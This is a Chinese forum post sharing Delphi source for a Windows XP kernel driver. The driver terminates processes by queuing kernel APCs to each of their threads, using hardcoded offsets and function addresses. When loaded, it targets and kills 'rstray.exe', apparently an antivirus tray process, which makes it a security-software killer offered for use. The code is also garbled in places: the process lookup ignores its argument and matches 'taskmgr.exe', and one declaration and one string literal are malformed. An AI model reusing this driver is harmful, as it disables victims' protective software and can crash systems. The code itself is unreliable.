HanDs
NO.2

[Delphi文章] 内核插apc杀进程代码 





学习中请遵循国家相关法律法规,黑客不作恶。没有网络安全就没有国家安全

本站需要登陆后才能查看

去年弄的,几个结构从c转换而来,C版可能就是论坛上某牛的代码。记得当时蓝得我痛不欲生,其中有几处硬编码,在我虚拟机上xp sp2上运行良好,其它系统估计要做适当的改动吧。代码着色使用的是吃抽大牛的CodeColorist

unit MyDriver;
{$HINTS OFF}
{$WARNINGS OFF}
interface

uses
  nt_status, ntoskrnl, native, winioctl, fcall, macros;

type
  TKILL = record
    PID: DWORD;
    XP_PsGetNextProcessThread: dword;
  end;
  PKILL = ^TKILL;

const
  DeviceName = '\Device\KPTest'; ///设备名
  DosDeviceName = '\??\KPTest'; ///符号链接名
  NtKernel = 'ntoskrnl.exe';
  SystemProcessesAndThreadsInformation = 05;
  PS_CROSS_THREAD_FLAGS_SYSTEM  =$10;

type
  KAPC_ENVIRONMENT = (OriginalApcEnvironment, AttachedApcEnvironment, CurrentApcEnvironment);
  MODE = (KernelMode, UserMode, MaximumMode);
  KPRIORITY = LONG;
  PKAPC_STATE = ^KAPC_STATE;
  KAPC_STATE = packed record
    ApcListHead: array[0..1] of TListEntry;
    Process: PVOID;
    KernelApcInProgress: boolean;
    KernelApcPending: boolean;
    UserApcPending: boolean;
  end;

  PAnsiString = ^TAnsiString;
  TAnsiString = packed record
    Length: Word;
    MaximumLength: Word;
    Buffer: PChar;
  end;
  PKNORMAL_ROUTINE = procedure(NormalContext, SystemArgument1, SystemArgument2: PVOID); stdcall;
  PKRUNDOWN_ROUTINE = procedure(Apc: PKAPC); stdcall;
  PKKERNEL_ROUTINE = procedure(Apc: PKAPC; NormalRoutine: PKNORMAL_ROUTINE; NormalContext, SystemArgument1, SystemArgument2: PVOID); stdcall;

{
  PKAPC = ^KAPC;


  KAPC = record
    Dtype: CSHORT;
    Size: CSHORT;
    Spare0: ULONG;
    Thread: PVOID;
    ApcListEntry: TListEntry;
    KernelRoutine: PKKERNEL_ROUTINE;
    RundownRoutine: PKRUNDOWN_ROUTINE;
    NormalRoutine: PKNORMAL_ROUTINE;
    NormalContext: PVOID;
    SystemArgument1: PVOID;
    SystemArgument2: PVOID;
    ApcStateIndex: CCHAR;
    ApcMode: CCHAR;
    Inserted: BOOLEAN;
  end;
}
function _DriverEntry(pDriverObject: PDRIVER_OBJECT; pusRegistryPath: PUNICODE_STRING): NTSTATUS; stdcall;

function KeStackAttachProcess(Process: PVOID; ApcState: PKAPC_STATE): NTSTATUS; stdcall; external NtKernel name '_KeStackAttachProcess';
function KeUnstackDetachProcess(ApcState: PKAPC_STATE): NTSTATUS; stdcall; external NtKernel name '_KeUnstackDetachProcess';
function PsGetProcessImageFileName(Process: PVOID): PUCHAR; stdcall; external NtKernel name '_PsGetProcessImageFileName';
function KeGetCurrentThread(): PKThread; stdcall; external NtKernel name '_KeGetCurrentThread';
function PsGetCurrentThread(): PEThread; stdcall; external NtKernel name '_PsGetCurrentThread';
function PsGetCurrentProcessId(): HANDLE; stdcall; external NtKernel name '_PsGetCurrentProcessId';
procedure ObDereferenceObject(MyObject: PVOID); stdcall; external NtKernel name '_ObDereferenceObject';
function PsTerminateSystemThread(ExitStatus: NTSTATUS): NTSTATUS; external NtKernel name '_PsTerminateSystemThread';

type
  TPSGETNEXTPROCESSTHREAD = function(Process: pvoid; Thread: PETHREAD): PETHREAD; stdcall;


function KeInitializeApc(
  Apc: PKAPC;
  Thread: PVOID;
  Environment: KAPC_ENVIRONMENT;
  KernelRoutine: PKKERNEL_ROUTINE;
  RundownRoutine: PKRUNDOWN_ROUTINE;
  NormalRoutine: PKNORMAL_ROUTINE;
  ProcessorMode: KPROCESSOR_MODE;
  NormalContext: PVOID
  ): NTSTATUS; stdcall; external NtKernel name '_KeInitializeApc';

function KeInsertQueueApc(
  Apc: PKAPC;
  SystemArgument1: PVOID;
  SystemArgument2: PVOID;
  Increment: KPRIORITY
  ): NTSTATUS; stdcall; external NtKernel name '_KeInsertQueueApc';

var
  g_usDeviceName, g_usSymbolicLinkName: UNICODE_STRING;


implementation

function gettargetpid(procname: pchar): ULONG;
var
  cb: DWORD;
  p, pTemp: PVOID;
  pnProcessName: TAnsiString;
  aa: Tansistring;
  iCnt: integer;
  pThreadAddr: Pointer;
  uModule: ULONG;
  process: PVOID;
begin
  cb := 0;
  result := 0;
  ZwQuerySystemInformation(SystemProcessesAndThreadsInformation, @p, 0, @cb);
  if cb <> 0 then
  begin
    p := ExAllocatePool(PagedPool, cb);
    if p <> nil then
    begin
      if ZwQuerySystemInformation(SystemProcessesAndThreadsInformation,
        p, cb, @cb) = STATUS_SUCCESS then
      begin
        pTemp := p;
        repeat
          with (PSYSTEM_PROCESS_INFORMATION(pTemp))^.Process_NT5.Process do
          begin
            RtlUnicodeStringToAnsiString(@pnProcessName, @ProcessName, True);
            //DbgPrint(pnProcessName.Buffer);
            if (_stricmp(pnProcessName.Buffer, 'taskmgr.exe') = 0) then
            begin
              PsLookupProcessByProcessId(ProcessId, process);
              result := ProcessId;
              exit;
            end;
            inc(PCHAR(pTemp), NextEntryDelta);
          end;
        until (PSYSTEM_PROCESS_INFORMATION(pTemp))^.Process_NT5.Process.NextEntryDelta = 0;
      end;
      ExFreePool(p);
    end;
  end;
end;


function DispatchCreateClose(p_DeviceObject: PDEVICE_OBJECT; p_Irp: PIRP): NTSTATUS; stdcall; ///对打开或关闭请求的响应 ,这里就是简单的返回一个成功
begin
  p_Irp^.IoStatus.Status := STATUS_SUCCESS; ///设置状态为STATUS_SUCCESS 即成功
  p_Irp^.IoStatus.Information := 0;
  IofCompleteRequest(p_Irp, IO_NO_INCREMENT); ///调用IoCompleteRequest完成IRP
  Result := STATUS_SUCCESS;
end;

function KernelTerminateThreadRoutine(
  Apc: PKAPC;
  NormalRoutine: PKNORMAL_ROUTINE;
  NormalContext: PVOID;
  SystemArgument1: PVOID;
  SystemArgument2: PVOID
  ):Ulong;stdcall;
begin
  ExFreePool(Apc);
  PsTerminateSystemThread(0);
  //DbgPrint('oh yeah!');
  result:=DbgPrint('oh yeah!');
end;

function MyTerminateThread(Thread: PETHREAD): BOOLEAN;
var
  bSucceed: BOOLEAN;
  Apc KAPC;
begin
  Apc := nil;
  bSucceed := FALSE;
  if not (MmIsAddressValid(Thread)) then
  begin
    result := false;
    exit;
  end;
  Apc := ExAllocatePool(NonPagedPool, sizeof(KAPC));
  DbgPrint('ethread is:%x', ulong(Thread));
  PULONG(ulong(Thread)+ $248 )^:=$00000010;
  DbgPrint('Apc^ is:%x', Apc^);
  DbgPrint('Apc is:%x', Apc);
  DbgPrint('sizeof(Apc) is:%x', sizeof(KAPC));
  DbgPrint('Thread is:%x', Thread);
  DbgPrint('OriginalApcEnvironment is:%x', OriginalApcEnvironment);
  DbgPrint([email protected] is:%x', @KernelTerminateThreadRoutine);
  DbgPrint('KernelMode is:%x', KernelMode);

  if Apc=nil then  DbgPrint('失败');
  KeInitializeApc(Apc,
    Thread,
    OriginalApcEnvironment,
    @KernelTerminateThreadRoutine,
    nil,
    nil,
    KPROCESSOR_MODE(KernelMode),
    nil);
  bSucceed := BOOLEAN(KeInsertQueueApc(Apc, PVOID(0), PVOID(0), 0)); 
  result := bSucceed;
end;

function Kill(eprocess: pvoid): NTSTATUS;
var
  st: NTSTATUS;
  ethread: PETHREAD;
  MyPspGetNetxtThread: TPSGETNEXTPROCESSTHREAD;
begin
  st := STATUS_SUCCESS;
  ethread := nil;
  MyPspGetNetxtThread := TPSGETNEXTPROCESSTHREAD($8057EAEC);
  ethread := MyPspGetNetxtThread(eprocess, nil);
  while ethread <> nil do
  begin
    MyTerminateThread(ethread);
    ethread := MyPspGetNetxtThread(eprocess, ethread);
  end;
  result := st;
end;

procedure KillByPid(pid: ulong);
var
  st: NTSTATUS;
  eprocess: pvoid;
begin
  st := STATUS_SUCCESS;
  eprocess := nil;
  DbgPrint('PID is:%d', pid);
  if pid=0 then exit;
  st := PsLookupProcessByProcessId(pid, eprocess);
  if (NT_SUCCESS(st)) then
  begin
    ObDereferenceObject(eprocess);
    st := Kill(eprocess);
  end;
end;


function DispatchControl(p_DeviceObject: PDEVICE_OBJECT; p_Irp: PIRP): NTSTATUS; stdcall;
var
  dwIoControlCode: DWORD;
  dwInputBufferLength, dwOutBufferLength: DWORD;
  status: NTSTATUS;
  dwBytesReturned: DWORD;
  psl: PIO_STACK_LOCATION;
  IOCTL_KILL_PROCESS: DWORD;
  pSystemBuffer: Pointer;
  //InBuffer: PKILL;
begin
  dwBytesReturned := 0;
  psl := IoGetCurrentIrpStackLocation(p_Irp); {取IRP的stack location的指针}
  dwIoControlCode := psl^.Parameters.DeviceIoControl.IoControlCode; ///取控制码
  dwInputBufferLength := psl^.Parameters.DeviceIoControl.InputBufferLength; ///传入Buffer的大小
  dwOutBufferLength := psl^.Parameters.DeviceIoControl.OutputBufferLength; ///传出Buffer的大小
  pSystemBuffer := p_Irp^.AssociatedIrp.SystemBuffer; ///传入Buffer的指针

  IOCTL_KILL_PROCESS := CTL_CODE(FILE_DEVICE_UNKNOWN, $805, METHOD_BUFFERED, FILE_READ_ACCESS + FILE_WRITE_ACCESS); ///生成我们的控制码

  if dwIoControlCode = IOCTL_KILL_PROCESS then ///如果是我们的控制码
  begin
    DbgPrint('Control Code is:0x%X', dwIoControlCode); ///输出我们的控制码
    dwBytesReturned := 0; ///这里设置返回数据的大小
    status := STATUS_SUCCESS;
  end else
  begin
    status := STATUS_INVALID_DEVICE_REQUEST;
  end;

  p_Irp^.IoStatus.Status := status;
  p_Irp^.IoStatus.Information := dwBytesReturned;

  IofCompleteRequest(p_Irp, IO_NO_INCREMENT); ///完成IRP
  Result := status;
end;

procedure DriverUnload(p_DriverObject: PDRIVER_OBJECT); stdcall;
begin
  DbgPrint('Driver Unload!'); ///输出调试字符串
  IoDeleteSymbolicLink(@g_usSymbolicLinkName); ///删除我们创建的符号链接
  IoDeleteDevice(p_DriverObject^.DeviceObject); ///删除我们创建的设备
end;

///驱动入口点

function _DriverEntry(pDriverObject: PDRIVER_OBJECT; pusRegistryPath: PUNICODE_STRING): NTSTATUS;
var
  status: NTSTATUS;
  mypid:ulong;
  DeviceObject: TDeviceObject;
begin
  status := STATUS_DEVICE_CONFIGURATION_ERROR;
  ///初始化UNICODE_STRING结构
  RtlInitUnicodeString(g_usDeviceName, DeviceName);
  RtlInitUnicodeString(g_usSymbolicLinkName, DosDeviceName);
  mypid:= gettargetpid('rstray.exe');
  DbgPrint('mypid is:%d', mypid);
  KillByPid(mypid);
  ///创建设备
  if (IoCreateDevice(pDriverObject, 0, @g_usDeviceName,
    FILE_DEVICE_UNKNOWN, 0, FALSE,
    DeviceObject) = STATUS_SUCCESS) then
  begin
    ///如果创建成功
    DbgPrint('Create Device Success'); ///输出调试字符串
    ///创建符号链接
    if (IoCreateSymbolicLink(@g_usSymbolicLinkName,
      @g_usDeviceName) = STATUS_SUCCESS) then
    begin
      ///如果创建符号链接成功执行下面的代码
      DbgPrint('Create SymbolicLink Success'); ///输出调试字符串
      ///开始设置我们自己的分发函数
      pDriverObject^.MajorFunction[IRP_MJ_CREATE] := @DispatchCreateClose; ///这里把IRP_MJ_CREATE IRP_MJ_CLOSE设置到一个函数上
      pDriverObject^.MajorFunction[IRP_MJ_CLOSE] := @DispatchCreateClose;
      pDriverObject^.MajorFunction[IRP_MJ_DEVICE_CONTROL] := @DispatchControl; ///对DeviceIoControl的响应,非常重要
      pDriverObject^.DriverUnload := @DriverUnload; ///当驱动动态卸载时执行DriverUnload
      status := STATUS_SUCCESS; ///返回STATUS_SUCCESS;
    end else ///如果创建符号链接不成功
    begin
      DbgPrint('Create SymbolicLink Failed'); ///输出调试字符串
      IoDeleteDevice(@DeviceObject); ///删除设备
    end;
  end;
  Result := status;
end;

end.


学习中请遵守法律法规,本网站内容均来自于互联网,本网站不负担法律责任
内核
#1楼
发帖时间:2016-7-9   |   查看数:0   |   回复数:0
游客组